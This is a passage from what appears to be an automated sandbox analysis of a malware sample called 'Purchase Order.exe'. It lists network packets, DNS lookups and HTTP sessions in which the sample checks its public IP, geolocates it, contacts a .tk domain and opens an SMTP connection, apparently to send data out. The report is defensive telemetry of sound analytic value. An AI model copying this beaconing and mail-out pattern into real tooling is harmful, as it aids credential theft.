Apr 5, 2024 08:21:27.165066004 CEST	443	49721	172.67.177.134	192.168.2.9
Apr 5, 2024 08:21:27.165275097 CEST	49721	443	192.168.2.9	172.67.177.134
Apr 5, 2024 08:21:27.167252064 CEST	49721	443	192.168.2.9	172.67.177.134
Apr 5, 2024 08:21:27.171169043 CEST	49718	80	192.168.2.9	158.101.44.242
Apr 5, 2024 08:21:27.172410965 CEST	49722	80	192.168.2.9	158.101.44.242
Apr 5, 2024 08:21:27.350626945 CEST	80	49718	158.101.44.242	192.168.2.9
Apr 5, 2024 08:21:27.350966930 CEST	49718	80	192.168.2.9	158.101.44.242
Apr 5, 2024 08:21:27.351533890 CEST	80	49722	158.101.44.242	192.168.2.9
Apr 5, 2024 08:21:27.355561018 CEST	49722	80	192.168.2.9	158.101.44.242
Apr 5, 2024 08:21:27.355561018 CEST	49722	80	192.168.2.9	158.101.44.242
Apr 5, 2024 08:21:27.535558939 CEST	80	49722	158.101.44.242	192.168.2.9
Apr 5, 2024 08:21:28.730889082 CEST	80	49722	158.101.44.242	192.168.2.9
Apr 5, 2024 08:21:28.732747078 CEST	49723	443	192.168.2.9	172.67.177.134
Apr 5, 2024 08:21:28.732788086 CEST	443	49723	172.67.177.134	192.168.2.9
Apr 5, 2024 08:21:28.732896090 CEST	49723	443	192.168.2.9	172.67.177.134
Apr 5, 2024 08:21:28.733505964 CEST	49723	443	192.168.2.9	172.67.177.134
Apr 5, 2024 08:21:28.733522892 CEST	443	49723	172.67.177.134	192.168.2.9
Apr 5, 2024 08:21:28.775785923 CEST	49722	80	192.168.2.9	158.101.44.242
Apr 5, 2024 08:21:28.991146088 CEST	443	49723	172.67.177.134	192.168.2.9
Apr 5, 2024 08:21:28.993128061 CEST	49723	443	192.168.2.9	172.67.177.134
Apr 5, 2024 08:21:28.993154049 CEST	443	49723	172.67.177.134	192.168.2.9
Apr 5, 2024 08:21:29.287784100 CEST	443	49723	172.67.177.134	192.168.2.9
Apr 5, 2024 08:21:29.287969112 CEST	443	49723	172.67.177.134	192.168.2.9
Apr 5, 2024 08:21:29.288203001 CEST	49723	443	192.168.2.9	172.67.177.134
Apr 5, 2024 08:21:29.288594007 CEST	49723	443	192.168.2.9	172.67.177.134
Apr 5, 2024 08:21:29.292509079 CEST	49722	80	192.168.2.9	158.101.44.242
Apr 5, 2024 08:21:29.293983936 CEST	49724	80	192.168.2.9	158.101.44.242
Apr 5, 2024 08:21:29.477008104 CEST	80	49724	158.101.44.242	192.168.2.9
Apr 5, 2024 08:21:29.477032900 CEST	80	49722	158.101.44.242	192.168.2.9
Apr 5, 2024 08:21:29.477169991 CEST	49722	80	192.168.2.9	158.101.44.242
Apr 5, 2024 08:21:29.477191925 CEST	49724	80	192.168.2.9	158.101.44.242
Apr 5, 2024 08:21:29.477466106 CEST	49724	80	192.168.2.9	158.101.44.242
Apr 5, 2024 08:21:29.656404972 CEST	80	49724	158.101.44.242	192.168.2.9
Apr 5, 2024 08:21:31.704392910 CEST	80	49724	158.101.44.242	192.168.2.9
Apr 5, 2024 08:21:31.705888987 CEST	49725	443	192.168.2.9	172.67.177.134
Apr 5, 2024 08:21:31.705921888 CEST	443	49725	172.67.177.134	192.168.2.9
Apr 5, 2024 08:21:31.705981016 CEST	49725	443	192.168.2.9	172.67.177.134
Apr 5, 2024 08:21:31.706271887 CEST	49725	443	192.168.2.9	172.67.177.134
Apr 5, 2024 08:21:31.706281900 CEST	443	49725	172.67.177.134	192.168.2.9
Apr 5, 2024 08:21:31.747412920 CEST	49724	80	192.168.2.9	158.101.44.242
Apr 5, 2024 08:21:31.963653088 CEST	443	49725	172.67.177.134	192.168.2.9
Apr 5, 2024 08:21:31.965555906 CEST	49725	443	192.168.2.9	172.67.177.134
Apr 5, 2024 08:21:31.965585947 CEST	443	49725	172.67.177.134	192.168.2.9
Apr 5, 2024 08:21:32.262814045 CEST	443	49725	172.67.177.134	192.168.2.9
Apr 5, 2024 08:21:32.262907028 CEST	443	49725	172.67.177.134	192.168.2.9
Apr 5, 2024 08:21:32.262962103 CEST	49725	443	192.168.2.9	172.67.177.134
Apr 5, 2024 08:21:32.263717890 CEST	49725	443	192.168.2.9	172.67.177.134
Apr 5, 2024 08:21:32.267685890 CEST	49724	80	192.168.2.9	158.101.44.242
Apr 5, 2024 08:21:32.268548012 CEST	49726	80	192.168.2.9	158.101.44.242
Apr 5, 2024 08:21:32.447724104 CEST	80	49726	158.101.44.242	192.168.2.9
Apr 5, 2024 08:21:32.447746038 CEST	80	49724	158.101.44.242	192.168.2.9
Apr 5, 2024 08:21:32.447877884 CEST	49724	80	192.168.2.9	158.101.44.242
Apr 5, 2024 08:21:32.448000908 CEST	49726	80	192.168.2.9	158.101.44.242
Apr 5, 2024 08:21:32.448319912 CEST	49726	80	192.168.2.9	158.101.44.242
Apr 5, 2024 08:21:32.627584934 CEST	80	49726	158.101.44.242	192.168.2.9
Apr 5, 2024 08:21:35.186863899 CEST	80	49726	158.101.44.242	192.168.2.9
Apr 5, 2024 08:21:35.188389063 CEST	49727	443	192.168.2.9	172.67.177.134
Apr 5, 2024 08:21:35.188421965 CEST	443	49727	172.67.177.134	192.168.2.9
Apr 5, 2024 08:21:35.188513994 CEST	49727	443	192.168.2.9	172.67.177.134
Apr 5, 2024 08:21:35.188796997 CEST	49727	443	192.168.2.9	172.67.177.134
Apr 5, 2024 08:21:35.188822985 CEST	443	49727	172.67.177.134	192.168.2.9
Apr 5, 2024 08:21:35.228914022 CEST	49726	80	192.168.2.9	158.101.44.242
Apr 5, 2024 08:21:35.452709913 CEST	443	49727	172.67.177.134	192.168.2.9
Apr 5, 2024 08:21:35.454737902 CEST	49727	443	192.168.2.9	172.67.177.134
Apr 5, 2024 08:21:35.454765081 CEST	443	49727	172.67.177.134	192.168.2.9
Apr 5, 2024 08:21:35.762602091 CEST	443	49727	172.67.177.134	192.168.2.9
Apr 5, 2024 08:21:35.762687922 CEST	443	49727	172.67.177.134	192.168.2.9
Apr 5, 2024 08:21:35.762753963 CEST	49727	443	192.168.2.9	172.67.177.134
Apr 5, 2024 08:21:35.763273954 CEST	49727	443	192.168.2.9	172.67.177.134
Apr 5, 2024 08:21:35.776438951 CEST	49726	80	192.168.2.9	158.101.44.242
Apr 5, 2024 08:21:35.956146002 CEST	80	49726	158.101.44.242	192.168.2.9
Apr 5, 2024 08:21:35.956212044 CEST	49726	80	192.168.2.9	158.101.44.242
Apr 5, 2024 08:21:36.168193102 CEST	49728	443	192.168.2.9	104.21.27.85
Apr 5, 2024 08:21:36.168231964 CEST	443	49728	104.21.27.85	192.168.2.9
Apr 5, 2024 08:21:36.168296099 CEST	49728	443	192.168.2.9	104.21.27.85
Apr 5, 2024 08:21:36.168848991 CEST	49728	443	192.168.2.9	104.21.27.85
Apr 5, 2024 08:21:36.168864965 CEST	443	49728	104.21.27.85	192.168.2.9
Apr 5, 2024 08:21:36.431972980 CEST	443	49728	104.21.27.85	192.168.2.9
Apr 5, 2024 08:21:36.432132959 CEST	49728	443	192.168.2.9	104.21.27.85
Apr 5, 2024 08:21:36.434696913 CEST	49728	443	192.168.2.9	104.21.27.85
Apr 5, 2024 08:21:36.434709072 CEST	443	49728	104.21.27.85	192.168.2.9
Apr 5, 2024 08:21:36.434933901 CEST	443	49728	104.21.27.85	192.168.2.9
Apr 5, 2024 08:21:36.436899900 CEST	49728	443	192.168.2.9	104.21.27.85
Apr 5, 2024 08:21:36.480237961 CEST	443	49728	104.21.27.85	192.168.2.9
Apr 5, 2024 08:22:07.617577076 CEST	443	49728	104.21.27.85	192.168.2.9
Apr 5, 2024 08:22:07.617645979 CEST	443	49728	104.21.27.85	192.168.2.9
Apr 5, 2024 08:22:07.617743969 CEST	49728	443	192.168.2.9	104.21.27.85
Apr 5, 2024 08:22:07.623598099 CEST	49728	443	192.168.2.9	104.21.27.85
Apr 5, 2024 08:22:13.033793926 CEST	49730	587	192.168.2.9	208.91.199.225
Apr 5, 2024 08:22:13.230365992 CEST	587	49730	208.91.199.225	192.168.2.9
Apr 5, 2024 08:22:13.230472088 CEST	49730	587	192.168.2.9	208.91.199.225
Apr 5, 2024 08:22:13.452451944 CEST	587	49730	208.91.199.225	192.168.2.9
Apr 5, 2024 08:22:13.494556904 CEST	49730	587	192.168.2.9	208.91.199.225
Apr 5, 2024 08:22:13.579083920 CEST	49730	587	192.168.2.9	208.91.199.225
Apr 5, 2024 08:22:13.777326107 CEST	587	49730	208.91.199.225	192.168.2.9
Apr 5, 2024 08:22:13.777354002 CEST	587	49730	208.91.199.225	192.168.2.9
Apr 5, 2024 08:22:13.778438091 CEST	49730	587	192.168.2.9	208.91.199.225
Apr 5, 2024 08:22:13.978909016 CEST	587	49730	208.91.199.225	192.168.2.9
Apr 5, 2024 08:22:13.979298115 CEST	49730	587	192.168.2.9	208.91.199.225
Apr 5, 2024 08:22:14.181341887 CEST	587	49730	208.91.199.225	192.168.2.9
Apr 5, 2024 08:22:14.181725025 CEST	49730	587	192.168.2.9	208.91.199.225
Apr 5, 2024 08:22:14.382597923 CEST	587	49730	208.91.199.225	192.168.2.9
Apr 5, 2024 08:22:14.382769108 CEST	49730	587	192.168.2.9	208.91.199.225
Apr 5, 2024 08:22:14.612895966 CEST	587	49730	208.91.199.225	192.168.2.9
Apr 5, 2024 08:22:14.615315914 CEST	49730	587	192.168.2.9	208.91.199.225
Apr 5, 2024 08:22:14.814532995 CEST	587	49730	208.91.199.225	192.168.2.9
Apr 5, 2024 08:22:14.814589024 CEST	49730	587	192.168.2.9	208.91.199.225
Apr 5, 2024 08:22:28.265058994 CEST	80	49714	158.101.44.242	192.168.2.9
Apr 5, 2024 08:22:28.265228987 CEST	49714	80	192.168.2.9	158.101.44.242

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 5, 2024 08:21:15.116008043 CEST	61686	53	192.168.2.9	1.1.1.1
Apr 5, 2024 08:21:15.241163015 CEST	53	61686	1.1.1.1	192.168.2.9
Apr 5, 2024 08:21:17.744934082 CEST	54936	53	192.168.2.9	1.1.1.1
Apr 5, 2024 08:21:17.871290922 CEST	53	54936	1.1.1.1	192.168.2.9
Apr 5, 2024 08:21:35.776346922 CEST	53257	53	192.168.2.9	1.1.1.1
Apr 5, 2024 08:21:36.167288065 CEST	53	53257	1.1.1.1	192.168.2.9
Apr 5, 2024 08:22:12.906419039 CEST	56100	53	192.168.2.9	1.1.1.1
Apr 5, 2024 08:22:13.032908916 CEST	53	56100	1.1.1.1	192.168.2.9

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 5, 2024 08:21:15.116008043 CEST	192.168.2.9	1.1.1.1	0xb85d	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Apr 5, 2024 08:21:17.744934082 CEST	192.168.2.9	1.1.1.1	0x3efa	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Apr 5, 2024 08:21:35.776346922 CEST	192.168.2.9	1.1.1.1	0x54b8	Standard query (0)	scratchdreams.tk	A (IP address)	IN (0x0001)	false
Apr 5, 2024 08:22:12.906419039 CEST	192.168.2.9	1.1.1.1	0xcd95	Standard query (0)	us2.smtp.mailhostbox.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Apr 5, 2024 08:21:15.241163015 CEST	1.1.1.1	192.168.2.9	0xb85d	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 5, 2024 08:21:15.241163015 CEST	1.1.1.1	192.168.2.9	0xb85d	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Apr 5, 2024 08:21:15.241163015 CEST	1.1.1.1	192.168.2.9	0xb85d	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Apr 5, 2024 08:21:15.241163015 CEST	1.1.1.1	192.168.2.9	0xb85d	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Apr 5, 2024 08:21:15.241163015 CEST	1.1.1.1	192.168.2.9	0xb85d	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Apr 5, 2024 08:21:15.241163015 CEST	1.1.1.1	192.168.2.9	0xb85d	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Apr 5, 2024 08:21:17.871290922 CEST	1.1.1.1	192.168.2.9	0x3efa	No error (0)	reallyfreegeoip.org		172.67.177.134	A (IP address)	IN (0x0001)	false
Apr 5, 2024 08:21:17.871290922 CEST	1.1.1.1	192.168.2.9	0x3efa	No error (0)	reallyfreegeoip.org		104.21.67.152	A (IP address)	IN (0x0001)	false
Apr 5, 2024 08:21:36.167288065 CEST	1.1.1.1	192.168.2.9	0x54b8	No error (0)	scratchdreams.tk		104.21.27.85	A (IP address)	IN (0x0001)	false
Apr 5, 2024 08:21:36.167288065 CEST	1.1.1.1	192.168.2.9	0x54b8	No error (0)	scratchdreams.tk		172.67.169.18	A (IP address)	IN (0x0001)	false
Apr 5, 2024 08:22:13.032908916 CEST	1.1.1.1	192.168.2.9	0xcd95	No error (0)	us2.smtp.mailhostbox.com		208.91.199.225	A (IP address)	IN (0x0001)	false
Apr 5, 2024 08:22:13.032908916 CEST	1.1.1.1	192.168.2.9	0xcd95	No error (0)	us2.smtp.mailhostbox.com		208.91.199.224	A (IP address)	IN (0x0001)	false
Apr 5, 2024 08:22:13.032908916 CEST	1.1.1.1	192.168.2.9	0xcd95	No error (0)	us2.smtp.mailhostbox.com		208.91.198.143	A (IP address)	IN (0x0001)	false
Apr 5, 2024 08:22:13.032908916 CEST	1.1.1.1	192.168.2.9	0xcd95	No error (0)	us2.smtp.mailhostbox.com		208.91.199.223	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

scratchdreams.tk

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49711	158.101.44.242	80	7692	C:\Users\user\Desktop\Purchase Order.exe

Timestamp	Bytes transferred	Direction	Data
Apr 5, 2024 08:21:15.427875042 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Apr 5, 2024 08:21:17.498852968 CEST	276	IN	HTTP/1.1 200 OK Date: Fri, 05 Apr 2024 06:21:17 GMT Content-Type: text/html Content-Length: 107 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>
Apr 5, 2024 08:21:17.505232096 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Apr 5, 2024 08:21:17.700793028 CEST	276	IN	HTTP/1.1 200 OK Date: Fri, 05 Apr 2024 06:21:17 GMT Content-Type: text/html Content-Length: 107 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>
Apr 5, 2024 08:21:18.448924065 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Apr 5, 2024 08:21:18.688565969 CEST	276	IN	HTTP/1.1 200 OK Date: Fri, 05 Apr 2024 06:21:18 GMT Content-Type: text/html Content-Length: 107 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.9	49714	158.101.44.242	80	7692	C:\Users\user\Desktop\Purchase Order.exe

Timestamp	Bytes transferred	Direction	Data
Apr 5, 2024 08:21:19.429409027 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Apr 5, 2024 08:21:21.604031086 CEST	276	IN	HTTP/1.1 200 OK Date: Fri, 05 Apr 2024 06:21:21 GMT Content-Type: text/html Content-Length: 107 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.9	49716	158.101.44.242	80	7692	C:\Users\user\Desktop\Purchase Order.exe

Timestamp	Bytes transferred	Direction	Data
Apr 5, 2024 08:21:22.346605062 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Apr 5, 2024 08:21:22.691642046 CEST	276	IN	HTTP/1.1 200 OK Date: Fri, 05 Apr 2024 06:21:22 GMT Content-Type: text/html Content-Length: 107 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.9	49718	158.101.44.242	80	7692	C:\Users\user\Desktop\Purchase Order.exe

Timestamp	Bytes transferred	Direction	Data
Apr 5, 2024 08:21:25.236736059 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Apr 5, 2024 08:21:26.608462095 CEST	276	IN	HTTP/1.1 200 OK Date: Fri, 05 Apr 2024 06:21:26 GMT Content-Type: text/html Content-Length: 107 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.9	49722	158.101.44.242	80	7692	C:\Users\user\Desktop\Purchase Order.exe

Timestamp	Bytes transferred	Direction	Data
Apr 5, 2024 08:21:27.355561018 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Apr 5, 2024 08:21:28.730889082 CEST	276	IN	HTTP/1.1 200 OK Date: Fri, 05 Apr 2024 06:21:28 GMT Content-Type: text/html Content-Length: 107 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.9	49724	158.101.44.242	80	7692	C:\Users\user\Desktop\Purchase Order.exe

Timestamp	Bytes transferred	Direction	Data
Apr 5, 2024 08:21:29.477466106 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Apr 5, 2024 08:21:31.704392910 CEST	276	IN	HTTP/1.1 200 OK Date: Fri, 05 Apr 2024 06:21:31 GMT Content-Type: text/html Content-Length: 107 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.9	49726	158.101.44.242	80	7692	C:\Users\user\Desktop\Purchase Order.exe

Timestamp	Bytes transferred	Direction	Data
Apr 5, 2024 08:21:32.448319912 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Apr 5, 2024 08:21:35.186863899 CEST	276	IN	HTTP/1.1 200 OK Date: Fri, 05 Apr 2024 06:21:35 GMT Content-Type: text/html Content-Length: 107 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49712	172.67.177.134	443	7692	C:\Users\user\Desktop\Purchase Order.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-05 06:21:18 UTC	88	OUT	GET /xml/102.129.152.231 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-04-05 06:21:18 UTC	714	IN	HTTP/1.1 200 OK Date: Fri, 05 Apr 2024 06:21:18 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 56867 Last-Modified: Thu, 04 Apr 2024 14:33:31 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0RYHRbrlgE5VF2%2F8%2B3yQS70dusdV2mqvFOljo%2Bi%2B3z%2BgivG1BJCDk5d9LeQaRRYyJRVFsfuphf2YO5LSjn5qiaqew4p9OZ2KP5yTd7kCxfswe5etjCSzdiIUEL%2BoxNGE5Mx2fE%2Fl"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86f76fedcbf374a8-MIA alt-svc: h3=":443"; ma=86400
2024-04-05 06:21:18 UTC	380	IN	Data Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73 Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
2024-04-05 06:21:18 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.9	49713	172.67.177.134	443	7692	C:\Users\user\Desktop\Purchase Order.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-05 06:21:18 UTC	64	OUT	GET /xml/102.129.152.231 HTTP/1.1 Host: reallyfreegeoip.org
2024-04-05 06:21:19 UTC	704	IN	HTTP/1.1 200 OK Date: Fri, 05 Apr 2024 06:21:19 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 56868 Last-Modified: Thu, 04 Apr 2024 14:33:31 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NammkhcUS8Rf6NwQ48qYWlsnPhnUqJRKNaZqERlE20B98wwxLlGKfNVxPBwZAFB86%2BYPbpvNO0hjICXXOojXumZbky6AtXrgJ7WUR80jG7TVOBeeo6C5Fm2G%2Bghhw7wMubIxmBMb"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86f76ff2d9c6daf5-MIA alt-svc: h3=":443"; ma=86400
